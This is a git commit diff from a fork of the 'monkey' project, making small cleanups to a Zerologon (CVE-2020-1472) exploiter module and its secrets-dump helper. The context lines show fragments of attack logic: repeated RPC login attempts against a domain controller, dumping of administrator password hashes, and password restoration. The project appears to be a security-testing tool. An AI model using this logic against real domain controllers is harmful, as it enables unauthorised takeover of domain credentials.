p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Testing changes

This commit is contained in:
Shreya 2021-02-12 13:58:19 +05:30
parent 2c2a9eaaae
commit 0866aee2cf
2 changed files with 12 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
monkey/infection_monkey/exploit/zerologon.py
View File

@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/. Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
""" """
import io
import logging import logging
import os import os
import sys
from binascii import unhexlify from binascii import unhexlify
from typing import List, Optional from typing import List, Optional
import impacket import impacket
from impacket.dcerpc.v5 import epm, nrpc, transport from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
LOG.debug("Attempting exploit.") LOG.debug("Attempting exploit.")
_exploited = self._send_exploit_rpc_login_requests(rpc_con) _exploited = self._send_exploit_rpc_login_requests(rpc_con)
rpc_con.disconnect()
else: else:
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.") LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
_exploited = False _exploited = False
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
return _exploited return _exploited
def is_exploitable(self) -> bool: def is_exploitable(self) -> bool:
if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']: if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
return True return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
return self.zerologon_finger.get_host_fingerprint(self.host) return self.zerologon_finger.get_host_fingerprint(self.host)
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]: def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
# Max attempts = 2000. Expected average number of attempts needed: 256. # Max attempts = 2000. Expected average number of attempts needed: 256.
result_exploit_attempt = None
for _ in range(0, self.MAX_ATTEMPTS): for _ in range(0, self.MAX_ATTEMPTS):
try: try:
result_exploit_attempt = self.attempt_exploit(rpc_con) result_exploit_attempt = self.attempt_exploit(rpc_con)
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
except Exception as e: except Exception as e:
LOG.error(e) LOG.error(e)
finally:
if rpc_con:
rpc_con.disconnect()
def get_admin_pwd_hashes(self) -> str: def get_admin_pwd_hashes(self) -> str:
try: try:
options = OptionsForSecretsdump( options = OptionsForSecretsdump(
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
except Exception as e: except Exception as e:
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}") LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]: def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
# Max attempts = 2000. Expected average number of attempts needed: 256. # Max attempts = 2000. Expected average number of attempts needed: 256.
result_restoration_attempt = None
for _ in range(0, self.MAX_ATTEMPTS): for _ in range(0, self.MAX_ATTEMPTS):
try: try:
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash) result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)

2
monkey/infection_monkey/exploit/zerologon_utils/dump_secrets.py
View File

@ -1,7 +1,5 @@
import io
import logging import logging
import os import os
import sys
import traceback import traceback
from impacket.examples.secretsdump import (LocalOperations, LSASecrets, from impacket.examples.secretsdump import (LocalOperations, LSASecrets,